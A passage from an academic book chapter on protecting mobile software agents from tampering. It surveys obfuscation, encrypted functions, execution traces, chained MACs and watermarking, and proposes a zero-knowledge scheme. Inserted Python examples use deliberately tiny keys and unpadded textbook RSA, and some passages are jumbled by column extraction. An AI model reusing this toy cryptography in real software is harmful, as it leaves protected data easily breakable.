Sharmin, M., Ahmed, S., & Ahamed, S. (2006b). An adaptive lightweight trust reliant secure resource discovery for pervasive computing environments. In Proceedings of the Fourth Annual IEEE International Conference on Pervasive Computer and Communications (PerCom 2006) (pp. 258-263).

Sharmin, M., Ahmed, S., & Ahamed, S. (2006c). SSRD+: A privacy-aware trust and security model for resource discovery in pervasive computing environment. In 30th Annual International Computer Software and Applications Conference (COMPSAC 2006) (pp. 67-70).

Smith, B., Seamons, K., & Jones, M. (2004). Responding to policies at runtime in TrustBuilder. In Fifth International Workshop on Policies for Distributed Systems and Networks (POLICY 2004).

Stajano, F. (2002). Security for ubiquitous computing. West Sussex, England: John Wiley and Sons.

Stajano, F., & Anderson, R. (2002). The resurrecting duckling: Security issues for ubiquitous computing. IEEE Computer, 35(4), 22-26.

Sun Microsystems. (2001). Jini™ technology core platform specification, version 1.2.

Thomas, R., & Sandhu, R. (2004). Models, protocols, and architectures for secure pervasive computing: Challenges and research directions. In Second IEEE International Conference on Pervasive Computing and Communications—Workshops (PerCom 2004) (pp. 164-168).

Tripathi, A., Ahmed, T., Kulkarni, D., Kumar, R., & Kashiramka, K. (2004). Context-based secure resource access in pervasive computing environments. In Second IEEE Annual Conference on Pervasive Computing and Communications—Workshops (p. 159).


Undercoffer, J., Perich, F., Cedilnik, A., Kagal, L., & Joshi, A. (2003). A secure infrastructure for service discovery and access in pervasive computing. Mobile Networks and Applications, 8(2), 113-125.

Want, R., & Pering, T. (2005). System challenges for ubiquitous and pervasive computing. In Twenty-seventh International Conference on Software Engineering (ICSE 2005) (pp. 9-14).

Weiser, M. (1991). The computer for the twenty-first century. Scientific American, 265(3), 94-104.

Weiser, M. (1993). Some computer science problems in ubiquitous computing. Communications of the ACM, 36(7), 75-84.

Winoto, W., Schwartz, E., Balakrishnan, H., & Lilley, J. (1999). The design and implementation of an intentional naming system. In 17th ACM Symposium on Operating Systems Principles (SOSP '99) (pp. 186-201).

Winslett, M. (2003). An introduction to automated trust establishment. In First International Conference on Trust Management.

Wu, C., Fu, L., & Lian, F. (2004). WLAN location determination in e-home via support vector classification. In IEEE Conference on Networking, Sensing & Control (pp. 1026-1031).

Youssef, M., Agrawala, A., & Udaya, A. (2003). WLAN location determination via clustering and probability distributions. In Proceedings of the First Annual IEEE International Conference on Pervasive Computer and Communications (PerCom 2003) (pp. 143-150).

Yu, T., & Winslett, M. (2003). A unified scheme for resource protection in automated trust negotiation. In IEEE Symposium on Security and Privacy (pp. 110-122).

Zhu, F., Mutka, M., & Ni, L. (2002). Classification of service discovery in pervasive computing environments (Tech. Rep. No. MSU-CSE-02-24). East Lansing: Michigan State University.

Zhu, F., Mutka, M., & Ni, L. (2003). Splendor: A secure, private, and location-aware service discovery protocol supporting mobile services. In Proceedings of the First IEEE Conference on Pervasive Computing and Communications (PerCom 2003) (pp. 235-242).

Zhu, F., Mutka, M., & Ni, L. (2004). PrudentExposure: A private and user-centric service discovery protocol. In Proceedings of the Second IEEE Conference on Pervasive Computing and Communications (PerCom 2004) (pp. 329-340).

Zhu, F., Mutka, M., & Ni, L. (2005). Expose or not? A progressive exposure approach for service discovery in pervasive computing environments. In Proceedings of the Third IEEE Conference on Pervasive Computing and Communications (PerCom 2005) (pp. 225-234).

Zhu, F., Mutka, M., & Ni, L. (2006). A private, secure, and user-centric information exposure model for service discovery protocols. IEEE Transactions on Mobile Computing, 5(4), 418-429.

Zimmermann, P. (1995). PGP source code and internals. Cambridge, MA: MIT Press.

Key Terms

Context: Context is the location, time, and activity state of the user when performing a service-related operation such as discovery, advertisement, or invocation.

Federated Discovery: Federated discovery is a service discovery mechanism that incorporates two or more different service advertisement mechanisms.

Meta Discovery: Meta discovery is the discovery of a service discovery mechanism by using meta information about that mechanism (Buford, Brown et al., 2006).

Peer Trust: Peer trust is the degree to which a peer device is willing to disclose information or provide access to resources to another peer, and


which may be determined by experience through earlier interactions, verifiable properties of each party, recommendations from trusted entities, and reputation in a community.

Pervasive Computing: Pervasive computing is the evolution of distributed computing in which networked computing devices are integrated throughout the personal and work environments in a connected way, also referred to as ubiquitous computing.

Secure Service Discovery: Secure service discovery is service discovery that enforces privacy and security policies of the devices participating in the service location process.

Service Composition: Service composition is the ability to dynamically discover and combine component services to form new services.

Service Discovery: Service discovery occurs when device resources and functions are packaged as services, in a networked environment, and a device finds another device capable of offering a specific service or resource.




Chapter III
Security of Mobile Code
Zbigniew Kotulski
Polish Academy of Sciences, Warsaw, Poland
Warsaw University of Technology, Poland

Aneta Zwierko
Warsaw University of Technology, Poland

Abstract

The recent development in mobile technology (mobile phones, middleware, wireless networks, etc.) created a need for new methods of protecting the code transmitted through the network. The oldest and simplest mechanisms concentrate more on the integrity of the code itself and on the detection of unauthorized manipulation. The newer solutions not only secure the compiled program, but also the data that can be gathered during its "journey," and even the execution state. Some other approaches are based on prevention rather than detection. In this chapter we present a new idea of securing mobile agents. The proposed method protects all components of an agent: the code, the data, and the execution state. The proposal is based on a zero-knowledge proof system and a secure secret sharing scheme, two powerful cryptographic primitives. Next, the chapter includes a security analysis of the new method and its comparison to other currently more widespread solutions. Finally, we propose a new direction of securing mobile agents by strengthening the methods of protecting integrity of the mobile code with risk analysis and a reputation system that helps to avoid high-risk behavior.

Introduction

A software agent is a program that can exercise an individual's or organization's authority, work autonomously toward a goal, and meet and interact with other agents (Jansen & Karygiannis, 1999). Agents can interact with each other to negotiate contracts and services, participate in auctions, or barter. Multi-agent systems have sophisticated applications, for example, as management systems for telecommunication networks or as artificial intelligence (AI)-based intrusion detection systems. Agents are commonly divided into two types:

• Stationary agents
• Mobile agents

The stationary agent resides at a single platform (host), the mobile one can move among different platforms (hosts) at different times.

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.

The mobile agent systems offer new possibilities for e-commerce applications: creating new types of electronic ventures from e-shops and e-auctions to virtual enterprises and e-marketplaces. Utilizing the agent system helps to automate many e-commerce tasks. Beyond simple information gathering tasks, mobile agents can take over all tasks of commercial transactions, namely, price negotiation, contract signing, and delivery of (electronic) goods and services. Such systems are developed for diverse business areas, for example, contract negotiations, service brokering, stock trading, and many others (Corradi, Cremonini, Montanari, & Stefanelli, 1999; Jansen & Karygiannis, 1999; Kulesza & Kotulski, 2003). Mobile agents can also be utilized in code-on-demand applications (Wang, Guan, & Chan, 2002). Mobile agent systems have advantages even over grid computing environments:

• Require less network bandwidth
• Increase asynchrony among clients and servers
• Dynamically update server interfaces
• Introduce concurrency

The benefits from utilizing mobile agents in various business areas are great. However, this technology brings some serious security risks; one of the most important is the possibility of tampering with an agent. In mobile agent systems the agent's code and internal data autonomously migrate between hosts and can be easily changed during the transmission or at a malicious host site. The agent cannot itself prevent this, but different countermeasures can be utilized in order to detect any manipulation made by an unauthorized party. They can be integrated directly into the agent system, or only into the design of an agent to extend the capabilities of the underlying agent system.

Several degrees of agent's mobility exist, corresponding to possibilities of relocating code and state information, including the values of instance variables, the program counter, execution stack, and so forth. The mobile agent technologies can be divided into two groups:

• Weakly mobile: Only the code is migrating; no execution state is sent along with an agent program
• Strongly mobile: A running program is moving to another execution location (along with its particular state)

The protection of the integrity of the mobile agent is the most crucial requirement for the agent system. The agent's code and internal data autonomously migrate between hosts and can be easily changed during the transmission or at a malicious host site. A malicious platform may make subtle changes in the execution flow of the agent's code; thus, the changes in the computed results are difficult to detect. The agent cannot itself prevent this, but different countermeasures can be utilized in order to detect any manipulation made by an unauthorized party. They can be integrated directly into the agent system, or only into the design of an agent to extend the capabilities of the underlying agent system. However, the balance between the security level and the solution implementation's cost, as well as performance impact, has to be preserved. Sometimes, some restrictions of agent's mobility may be necessary.

Accountability is also essential for the proper functioning of the agent system and establishing trust between the parties. Even an authenticated agent is still able to exhibit malicious behavior to the platform if such a behavior cannot later be detected and proved. Accountability is usually realized by maintaining an audit log of security-relevant events. Those logs must be protected from unauthorized access and modification. Also the non-repudiability of logs is a huge concern. An important factor of accountability is authentication. Agents must be able to authenticate to platforms and other agents and vice versa. An agent may require different degrees of authentication depending on the level of sensitivity of the data.

The accountability requirement needs also to be balanced with an agent's need for privacy. The platform may be able to keep the agent's identity secret from other agents and still maintain a form of revocable anonymity where it can determine the agent's identity if necessary and legal. The


security policies of agent platforms and their auditing requirements must be carefully balanced with agent's privacy requirements.

Threats to security generally fall into three main classes: (1) disclosure of information, (2) denial of service, and (3) corruption of information (Jansen, 1999). Threats in an agent system can be categorized with regard to agent and platform relations (e.g., an agent attacking an agent, etc.). Another taxonomy of attacks in agent systems was proposed in Man and Wei (2001). The article describes two main categories of attacks: purposeful and frivolous. The first kind is carefully planned and designed and can be further classified by the nature of the attack (read or non-read) and the number of attackers (solo or collaborative). During the second kind of attacks, the attacker may not know the effect of his/her actions or gain an advantage. These attacks can be random or total. Another category of attacks is connected with traffic analysis (Kulesza, Kotulski, & Kulesza, 2006) or so-called blocking attacks (when a malicious platform refuses to migrate the agent), as described by Shao and Zhou (2006). In this chapter we will focus on the threats from an agent's perspective.

Among the mentioned threats, the most important are connected with the agent platform, since the most difficult to ensure is the agent's code/state integrity. There are two main concepts for protecting mobile agent's integrity:

• Providing a trusted environment for agent's execution
• Detection or prevention of tampering

The first group of methods is more concentrated on the whole agent system than on an agent in particular. These seem to be easier to design and implement but, as presented in Oppliger (2000), mostly lead to some problems. The assumption that an agent works only with a group of trusted hosts makes the agent less mobile than it was previously assumed. Also an agent may need different levels of trust (some information should be revealed to a host while in another situation it should be kept secret). Sometimes, it is not clear in advance that the current host can be considered as trusted. A method to provide such an environment is special tamper-resistant hardware, but the cost of such a solution is usually very high.

The second group of methods provides the agents' manager with tools to detect that the agent's data or code has been modified, or an agent with a mechanism that prevents a successful, unauthorized manipulation. In this chapter we concentrate on the "built-in" solutions because they enable an agent to stay mobile in the strong sense and, moreover, provide the agent with mechanisms to detect or prevent tampering. Detection means that the technique is aimed at discovering unauthorized modification of the code or the state information. Prevention means that the technique is aimed at preventing changes of the code and the state information in any way. To be effective, detection techniques are more likely than prevention techniques to depend on a legal or other social framework. The distinction between detection and prevention can sometimes be arbitrary, since prevention often involves detection (Jansen, 2000).

Background

Many authors have proposed methods for protecting code/state integrity of mobile code. The most interesting of them are presented in this section.

Time Limited Black-Box Security and Obfuscated Code

These methods are based on a black-box approach. The main idea of the black-box is to generate executable code from a given agent's specification that cannot be attacked by read (disclosure) or modification attacks. An agent is considered to be a black-box if at any time the agent code cannot be attacked in the previous sense, and if only its input and output can be observed by the attacker. Since it is not possible to implement it today, a relaxation of this notion was introduced by Hohl (1998): it is not assumed that the black-box protection holds forever, but only for a certain known time. According to this definition, an agent has the time-limited black-box property if for a certain known time it


cannot be attacked in the aforementioned sense. Encrypted functions


The time limited black-boxfulfillstwoblack-box
properties for this limited time: The encrypted functions (EF) method is one step
forward in implementing the perfect black-box
• Code and data of the agent specification cannot be read
• Code and data of the agent specification cannot be modified

This scheme will not protect any data that is added later, although the currently existing variables will be changeable. Thus, it cannot protect the state of an agent, which can change between different hosts, or any data which the agent gathered.

In order to achieve the black-box property, several conversion algorithms were proposed. They are also called obfuscating or mess-up algorithms. These algorithms generate a new agent out of an original agent, which differs in code but produces the same results.

The code obfuscation methods make it more complicated to obtain the meaning from the code. To change a program code into a less easily readable form, they have to work in an automatic and parametric manner. The additional parameters should make it possible that the same original program is transformed into different obfuscated programs. The difficulty is to transform the program in a way that the original (or a similar, easily understandable) program cannot be re-engineered automatically. Another problem is that it is quite difficult to measure the quality of obfuscation; this depends not only on the used algorithm, but on the ability of the re-engineering as well. Some practical methods of code obfuscation are described by Low (1998), and a general taxonomy was proposed by Collberg, Thomborson, and Low (1997).

Since an agent can become invalid before completing its computation, the obfuscated code is suitable for applications that do not convey information intended for long-lived concealment. Also, it is still possible for an attacker to read and manipulate data and code, but, as the role of these elements cannot be determined, the results of this attack are random and have no meaning for the attacker.

... security. The encrypted functions (EF) approach was proposed initially by Sander and Tschudin (1998). Since then other similar solutions were introduced (Alves-Foss, Harrison, & Lee, 2004; Burmester, Chrissikopoulos, & Kotzanikolaou, 2000), and the method is believed to be one of the canonical solutions for preserving an agent's integrity (Jansen, 2000; Oppliger, 2000). The goal of EF, according to Jansen (2000), is to find a method which enables the mobile code to safely compute cryptographic primitives, such as a digital signature, even though the code is executed in non-trusted computing environments and operates autonomously without interactions with the home platform. The approach is to enable the agent platform to execute a program embodying an encrypted function without being able to extract the original form. This approach requires differentiation between a function and a program that implements the function.

The EF system is described as follows by Oppliger (2000):

A has an algorithm to compute function f. B has an input x and is willing to compute f(x) for A, but A wants B to learn nothing substantial about f. Moreover, B should not need to interact with A during the computation of f(x).

The function f can be, for example, a signature algorithm with an embedded key or an encryption algorithm containing one. This would enable the agent to sign or encrypt data at the host without revealing its secret key.

Although the idea is straightforward, it is hard to find appropriate encryption schemes that can transform arbitrary functions in this way. So far, techniques to encrypt rational functions and polynomials have been proposed. Also a solution based on the RSA cryptosystem was described (Burmester et al., 2000).
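Added example (not code from the chapter or from the cited papers): the homomorphic idea behind encrypting a polynomial, written here with a textbook Paillier cryptosystem on toy Mersenne-prime parameters that are an assumption of this illustration. Party A hides f(x) = a_0 + a_1 x + a_2 x^2 by encrypting each coefficient; party B evaluates the encrypted polynomial on its own x using only the public modulus, and only A can decrypt the result, so B learns nothing about f. All function and variable names are the example's own.

```python
import secrets
from math import gcd

# Toy Paillier key pair (assumption of this example): the factors are Mersenne primes, so
# n is only ~150 bits. A real deployment needs a ~2048-bit modulus. Only N is public.
_P, _Q = (1 << 61) - 1, (1 << 89) - 1
N = _P * _Q
N2 = N * N
LAMBDA = (_P - 1) * (_Q - 1) // gcd(_P - 1, _Q - 1)          # lcm(p-1, q-1); private
MU = pow((pow(N + 1, LAMBDA, N2) - 1) // N, -1, N)           # L(g^lambda mod n^2)^-1; private


def encrypt(m):
    """Paillier encryption E(m) = (1+n)^m * r^n mod n^2 (randomised, additively homomorphic)."""
    r = secrets.randbelow(N - 1) + 1
    return pow(N + 1, m % N, N2) * pow(r, N, N2) % N2


def decrypt(c):
    """Paillier decryption: L(c^lambda mod n^2) * mu mod n, with L(u) = (u-1)/n."""
    return (pow(c, LAMBDA, N2) - 1) // N * MU % N


def encrypt_polynomial(coeffs):
    """Party A (the agent's originator): hide f(x) = sum_i a_i x^i by encrypting each a_i.
    The list of ciphertexts is what the agent carries to the host."""
    return [encrypt(a) for a in coeffs]


def evaluate_encrypted(enc_coeffs, x):
    """Party B (the host): compute E(f(x)) from the encrypted coefficients and its own input x,
    using only the public modulus. Since E(a)*E(b) = E(a+b) and E(a)^k = E(k*a),
    prod_i E(a_i)^(x^i) = E(sum_i a_i x^i). B never sees the coefficients or f(x)."""
    acc = 1
    for i, c in enumerate(enc_coeffs):
        acc = acc * pow(c, pow(x, i), N2) % N2
    return acc


def evaluate_plain(coeffs, x):
    """Reference value f(x) mod n, used only to check the homomorphic result."""
    return sum(a * x ** i for i, a in enumerate(coeffs)) % N


def demo(coeffs=(7, 3, 2), x=5):
    """Round trip: A encrypts f, B evaluates blindly, A decrypts. Returns (f(x), recovered)."""
    enc = encrypt_polynomial(coeffs)
    return evaluate_plain(coeffs, x), decrypt(evaluate_encrypted(enc, x))


if __name__ == "__main__":
    print(demo())   # (72, 72)
```

The host's work in `evaluate_encrypted` is the whole point: it runs a program that computes f(x) without ever holding f, which is the function/program distinction the text draws. What the construction does not give is a way to sign with an embedded key, and the rational-function and RSA-based constructions cited above are not reproduced here.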


Security of Mobile Code

Cryptographic Traces

The articles by Vigna (1997, 1998) introduced cryptographic traces (also called execution traces) to provide a way to verify the correctness of the execution of an agent. The method is based on traces of the execution of an agent, which can be requested by the originator after the agent's termination and used as a basis for the execution verification. The technique requires each platform involved to create and retain a non-repudiation log or trace of the operations performed by the agent while resident there, and to submit a cryptographic hash of the trace upon conclusion as a trace summary or fingerprint. The trace is composed of a sequence of statement identifiers and platform signature information. The signature of the platform is needed only for those instructions that depend on interactions with the computational environment maintained by the platform. For instructions that rely only on the values of internal variables, the signature is not required and therefore is omitted.

This mechanism allows detecting attacks against the code, state and control flow of mobile agents. This way, in the case of tampering, the agent's owner can prove that the claimed operations could never have been performed by the agent. The technique also defines a secure protocol to convey agents and associated security-related information among the various parties involved, which may include a trusted third party to retain the sequence of trace summaries for the agent's entire itinerary. The approach has a number of drawbacks, the most obvious being the size and number of logs to be retained, and the fact that the detection process is triggered only sporadically, based on observations of suspicious results or other factors.

Chained MAC Protocol

Different versions of the chained message authentication code (MAC) protocol were described by Karjoth, Asokan, and Gulcu (1999) and Yee (1999). Some of them require the existence of a public key infrastructure, others are based on a single key. This protocol allows an agent to achieve strong forward integrity. To utilize this protocol, only the public key of the originator has to be known by all agent places. This can occur when the originator is a rather big company that is known by its smaller suppliers.

Assume that $r_n$ is a random number generated by the $n$-th host. This value will be used as a secret key in a MAC. The partial result $o_n$ (a single piece of data generated on the $n$-th host), $r_n$ and the identity of the next host are encrypted with the public key of the originator $K_{i_0}$, forming the encapsulated message $O_n$:

$$O_n = \{r_n, o_n, \mathrm{id}(i_{n+1})\}_{K_{i_0}}$$

A chaining relation is defined as follows (here $H$ denotes a hash function and $h$ denotes the digest):

$$h_0 = \{r_0, o_0, \mathrm{id}(i_1)\}_{K_{i_0}}$$

and

$$h_{n+1} = H(h_n, r_n, o_n, \mathrm{id}(i_{n+1}))$$

When an agent is migrating from host $i_n$ to $i_{n+1}$:

$$i_n \rightarrow i_{n+1}: \{O_0, \ldots, O_n, h_{n+1}\}$$

Similar schemes are also called partial results encapsulation methods (Jansen, 2000).

Watermarking

Watermarking is mainly used to protect the copyrights of digital contents. A distributor or an owner of the content embeds a mark into a digital object, so its ownership can be proven. This mark is usually secret. Most methods exploit information redundancy, and some of them can also be used to protect the mobile agent's data and code.

A method of watermarking the mobile code was proposed by Esparza, Fernandez, Soriano, Munoz, and Forne (2003). A mark is embedded into the mobile agent by using software watermarking techniques. This mark is transferred to the agent's results during the execution. For the executing



hosts, the mark is a normal part of the results and is "invisible." If the owner of the agent detects that the mark has been changed (it is different than expected), he or she has proof that the malicious host was manipulating the agent's data or code. Figure 1 illustrates how the mark is appended to data during the mobile agent's computations on various hosts.

The paper by Esparza et al. (2003) presents three ways of embedding the watermark into the agent:

• Marking the code
• Marking the input data
• Marking the obfuscated code

The mark or marks are validated after the agent returns to its originator.

Possible attacks against this method include:

• Eavesdropping: If the data is not protected in any way (e.g., not encrypted) it can be read by every host.
• Manipulation: The malicious host can try to manipulate either the agent's code or data to change the results and still keep the proper mark.
• Collusion: A group of malicious hosts can cooperate to discover the mark by comparing the obtained results.

Fingerprinting

Software fingerprinting uses watermarking techniques in order to embed a different mark for each user. Software fingerprinting shares weaknesses with software watermarking: marks must be resilient to manipulation and "invisible" to observers.

The method for fingerprinting was proposed by Esparza et al. (2003). Contrary to the watermarking methods presented previously here, the embedded mark is different for each host. When the agent returns to the owner, all results are validated and the malicious host is directly traced (see Figure 2).

The article presents two ways of embedding the mark into the agent:

• Marking the code: In this case, malicious hosts have the possibility of comparing their different codes in order to locate their marks.
• Marking the input data: The data are usually different for each host, so it is harder to identify the mark.

The procedure is similar to the mobile agent watermarking approach. However, the owner must know each mark for each host and their location. One of the possibilities of reconstructing the marks is to catch the information about the previously chosen places in the results.

Figure 1. Example of watermarking
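As an added worked example of the Chained MAC Protocol section above (not code from the chapter or from Karjoth et al.), the following Python builds the encapsulated messages O_n and the digest chain h_{n+1} as written there, then has the originator verify the returned agent. The originator's key pair is textbook RSA on toy Mersenne-prime factors with no padding, and SHA-256 stands in for H; both are assumptions of this illustration, as are the host identities and partial results, which are constructed sample data.

```python
import hashlib
import secrets
import struct

# Originator key pair (assumption of this example): textbook RSA on two Mersenne primes,
# ~150-bit modulus, no padding. Illustration only; not a secure encryption scheme.
_P, _Q = (1 << 61) - 1, (1 << 89) - 1
N_PUB = _P * _Q                                  # public modulus, part of K_i0
E_PUB = 65537
D_PRIV = pow(E_PUB, -1, (_P - 1) * (_Q - 1))     # known only to the originator
MSG_LEN = 19                                     # bytes needed to hold a value < N_PUB


def encapsulate(r_n, o_n, next_id):
    """O_n = {r_n, o_n, id(i_{n+1})}_{K_i0}: 8-byte r_n, 32-bit o_n, 16-bit id -> 14 bytes < N_PUB."""
    plain = struct.pack(">8sIH", r_n, o_n, next_id)
    return pow(int.from_bytes(plain, "big"), E_PUB, N_PUB)


def decapsulate(o_enc):
    """Only the originator can open O_n and learn r_n, o_n and the declared next host."""
    plain = pow(o_enc, D_PRIV, N_PUB).to_bytes(14, "big")
    return struct.unpack(">8sIH", plain)


def chain_step(h_n, r_n, o_n, next_id):
    """h_{n+1} = H(h_n, r_n, o_n, id(i_{n+1})) with H = SHA-256 over the concatenation."""
    return hashlib.sha256(h_n + r_n + struct.pack(">IH", o_n, next_id)).digest()


def host_append(encs, h_n, o_n, next_id):
    """Host i_n seals its partial result and extends the chain; the agent then migrates
    carrying {O_0, ..., O_n, h_{n+1}}. For n = 0, h_0 is the encapsulated message itself."""
    r_n = secrets.token_bytes(8)
    o_enc = encapsulate(r_n, o_n, next_id)
    if not encs:
        h_n = o_enc.to_bytes(MSG_LEN, "big")
    return encs + [o_enc], chain_step(h_n, r_n, o_n, next_id)


def originator_verify(encs, h_final):
    """Open every O_k, rebuild the chain from h_0 and compare with the carried digest."""
    h = encs[0].to_bytes(MSG_LEN, "big")
    for o_enc in encs:
        r_k, o_k, next_id = decapsulate(o_enc)
        h = chain_step(h, r_k, o_k, next_id)
    return h == h_final


def run_itinerary(results, route, tamper=None):
    """Drive the agent along `route` (originator first and last). `tamper=(k, value)` lets the
    last host replace O_k with a fresh encapsulation of its own value: it cannot open the
    original O_k, so it knows neither r_k nor o_k and cannot recompute the chain."""
    encs, h = [], b""
    for pos, host in enumerate(route[:-1]):
        encs, h = host_append(encs, h, results[host], route[pos + 1])
    if tamper is not None:
        k, forged = tamper
        encs[k] = encapsulate(secrets.token_bytes(8), forged, route[k + 1])
    return originator_verify(encs, h)


# Constructed sample itinerary: originator 0 visits hosts 1, 2, 3 and returns home.
ROUTE = [0, 1, 2, 3, 0]
RESULTS = {0: 100, 1: 95, 2: 90, 3: 92}   # e.g. price offers collected on each host

if __name__ == "__main__":
    print(run_itinerary(RESULTS, ROUTE))                   # True
    print(run_itinerary(RESULTS, ROUTE, tamper=(1, 50)))   # False: host 1's result was replaced
```

The forward-integrity argument is visible in `run_itinerary`: a later host sees only the ciphertexts and the latest digest, never the earlier r_k, so it can neither re-seal an earlier result nor recompute the chain that covers it; the originator detects both a replaced value and a re-encryption of the same value under a new r_k.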



Figure 2. Example of fingerprinting

Possible attacks against this method include:

• Eavesdropping: If the data are not protected in any way (e.g., not encrypted) they can be read by every host.
• Manipulation: The malicious host can try to manipulate either the agent's code or data to change the results and still keep the proper mark.
• Collusion: Colluding hosts cannot extract any information about the mark by comparing their data or results, because every host has different input data and a different embedded mark.

The difference between mobile agent watermarking and fingerprinting is the fact that in the second case it is possible to detect collusion attacks performed by a group of dishonest hosts.

Publicly Verifiable Chained Digital Signatures

This protocol, proposed by Karjoth (1998), allows verification of the agent's chain of partial results not only by the originator, but also by every agent place. However, it is still vulnerable to interleaving attacks. This protocol makes it possible for every agent place which receives an agent to verify that it has not been compromised. This saves computing power because if an agent has indeed been compromised, the agent place can reasonably refuse to execute the compromised agent.

Environmental Key Generation

This scheme allows an agent to take a predefined action when some environmental condition is true (Riordan & Sch
neier, 1998). The approach centers on constructing agents in such a way that upon encountering an environmental condition (e.g., via a matched search string), a key is generated, which is then used to cryptographically unlock some executable code. The environmental condition is hidden through either a one-way hash or public key encryption of the environmental trigger. This technique ensures that a platform or an observer of the agent cannot uncover the triggering message or response action by directly reading the agent's code.

Itinerary Recording with Replication and Voting

A faulty agent platform can behave similarly to a malicious one. Therefore, applying fault tolerant



capabilities to this environment should help counter the effects of malicious platforms (Schneider, 1997). One such technique for ensuring that a mobile agent arrives safely at its destination is through the use of replication and voting. Rather than using a single copy of an agent to perform a computation, multiple copies are used. Although a malicious platform may corrupt a few copies of the agent, enough replicas avoid the encounter to successfully complete the computation. A slightly different method based on multiple copies of an agent was proposed by Benachenhou and Pierre (2006). In this proposal, a copy of the agent is executed on a trusted platform to validate the results obtained on other platforms.

A METHOD BASED ON SECRETS AND PROOFS

In the proposed system we assume that there exist at least three parties:

• A manager
• An agent
• A host

The manager can be an originator of the agent. It plays the role of a verification instance in the scheme and creates initial countermeasures for the agent. The manager also plays the role of a trusted third party.

Outline of the Method

Zero-knowledge proof systems (Goldreich, 2002) enable the verifier to check the validity of the assumption that the prover knows a secret. In our system the verifier would be the manager or owner of agents and, obviously, agents would be the provers. In the initial phase, the manager computes a set of secrets. The secrets are then composed into the agent, so that if the manager asks the agent to make some computations (denote them as a function $f$), the result would be a valid secret. This function should have the following property:

• If we have $x_1$ and $f(x_1)$, then it is computationally infeasible to find $x_2 \neq x_1$ such that $f(x_1) = f(x_2)$

If the secret is kept within an agent, then the host can also use the zero-knowledge protocol to verify it. Every authorized change of the agent's state results in such a change of the secret that the secret remains valid. On the other hand, every unauthorized change leads to losing the secret, so at the moment of verification by the host or manager, the agent is not able to prove possession of a valid secret. Since the host can monitor all of the agent's computations, the secret should not only change with the agent's execution state, but should also be different for different hosts, so one host could only validate the secret prepared for operations that should be executed at this platform. In our system the host can tamper with the agent and try to make such changes that he/she will still be able to obtain the proper secret, but the characteristics of the function $f$ will not allow this. A possible candidate for the function $f$ is a hash function. Our approach is detection rather than prevention (see Zwierko & Kotulski, 2007).

Specification of the Method

The Initial Phase

The initial phase has three steps:

1. The manager computes a set of so-called identities, denoted as ID. It is public. For each identity, the manager computes an appropriate secret, denoted as N. The details for generating those values depend upon the chosen zero-knowledge system.
2. To compose N into an agent, any secure secret sharing scheme (Pieprzyk, Hardjono, & Seberry, 2003) with threshold t can be used. The manager creates n shares, such that the reconstructed secret would be N. The t-1 shares are composed into an agent and the rest are distributed among the hosts via secure channels (this is illustrated in Figure 3).
3. The manager now needs to glue the shares into an agent in such a way that, when the


agent is in a proper execution state, it is able to obtain from its code/state variables the correct shares. Since the agent is nothing more than a computer program, it can be described as a finite state machine (FSM). Assume we have the agent of the form $\langle \Sigma, S, S_I, S_F, \delta \rangle$, where:

• $\Sigma$ is the input alphabet
• $S = \{f_0, \ldots, f_n\}$ is the set of all possible states
• $S_I$ is the subset of $S$ with all initial states
• $S_F$ is the subset of $S$ with all finishing states, possibly empty
• $\delta: \Sigma \times S \rightarrow S$ is the state transition function.

Figure 4 shows an example of an agent's FSM. It is obvious that only some execution states should be observed during the computation at the host platform (e.g., the ones connected with gathering and storing the data). If the state $f_j$ is the first state of the agent's computations at the host platform, then it is natural that the shares should be generated only from this state. Additionally, some internal variables that differ for each host should be utilized to obtain different secrets for each host. Thus, to create the agent's shares, $f_j$, $c_i \in \Sigma$, and the code should be used.

In other cases, where the pair $f_j$ and $c_i$ is not unique for each host, the previous states or other data should be used. It should be possible to obtain the proper shares for the current host based on the appropriate execution state and internal variables. If there is more than one unique combination of $(f_j, c_i)$ for one host, then for each of them the host should obtain an ID and a share. The agent's code (in a certain form) should be a part of the data that are required to recreate the secret, to enable detection of every unauthorized manipulation which could be performed by a previous host.

To create the shares from the mentioned data, a hash function or an encryption function with the manager's public key can be used.

The Validation Phase

1. The host, which wants to verify an agent's integrity, sends its share to the agent.

Figure 3. Distributing ID and shares to hosts

Figure 4. Mobile agent as an FSM


2. The agent creates the rest of the shares from its code and the execution state. It recreates the secret. The agent computes the secret $\sigma$ and uses it for the rest of the scheme, which is a zero-knowledge identification protocol.
3. The agent and the host execute the selected zero-knowledge protocol, so that the host can confirm the correctness of $\sigma$.

The manager can compute many identities, which may be used with different execution states. In that situation the agent should first inform the host which identity should be used, or the host can simply check the correctness of $\sigma$ for all possible identities.

SECURITY AND SCALABILITY

Definitions and Notions

This section presents basic notions concerning an agent's integrity that will later be used in the description of the selected solutions. The integrity of an agent means that an unauthorized party cannot change its code or execution state, or such changes should be detectable (by an owner, a host or an agent platform which wants to interact with the agent). Authorized changes occur only when the agent has to migrate from one host to another. Next is a more formal definition:

Definition 1 (integrity of an agent). An agent's integrity is not compromised if no unauthorized modification can be made without the agent's owner noticing this modification.

The concept of forward integrity is also used for the evaluation of many methods (Karjoth et al., 1999; Yee, 1999). This notion is used in a system where the agent's data can be represented as a chain of partial results (a sequence of static pieces of data). Forward integrity can be divided into two types, which differ in their ability to resist cooperating malicious hosts. The general goal is to protect the results within the chain of partial results from being modified. Given a sequence of partial results, forward integrity is defined as follows:

Definition 2 [weak forward integrity (Karjoth et al., 1999; Yee, 1999)]. The agent possesses the weak forward integrity feature if the integrity of each partial result $m_0, \ldots, m_{n-1}$ is provided when $i_n$ is the first malicious agent place on the itinerary.

Weak forward integrity is conceptually not resistant to cooperating malicious hosts and agent places that are visited twice. To really protect the integrity of partial results, we need a definition without constraints.

Definition 3 [strong forward integrity (Karjoth et al., 1999)]. The agent system preserves strong forward integrity of the agent if none of the agent's encapsulated messages $m_k$, with $k < n$, can be modified without the manager noticing.

In this chapter we refer to forward integrity as strong forward integrity (when applicable). To make the notion of forward integrity more useful, we also define publicly verifiable forward integrity, which enables any host to detect compromised agents:

Definition 4 (publicly verifiable forward integrity). The agent possesses publicly verifiable forward integrity if every host $i_n$ can verify that the agent's chain of partial results $m_{i_0}, \ldots, m_{i_n}$ has not been compromised.

The other important notion concerning an agent's integrity, the concept of black-box security (Hohl, 1998), was introduced in the Time Limited Black-Box Security and Obfuscated Code section.

Analysis

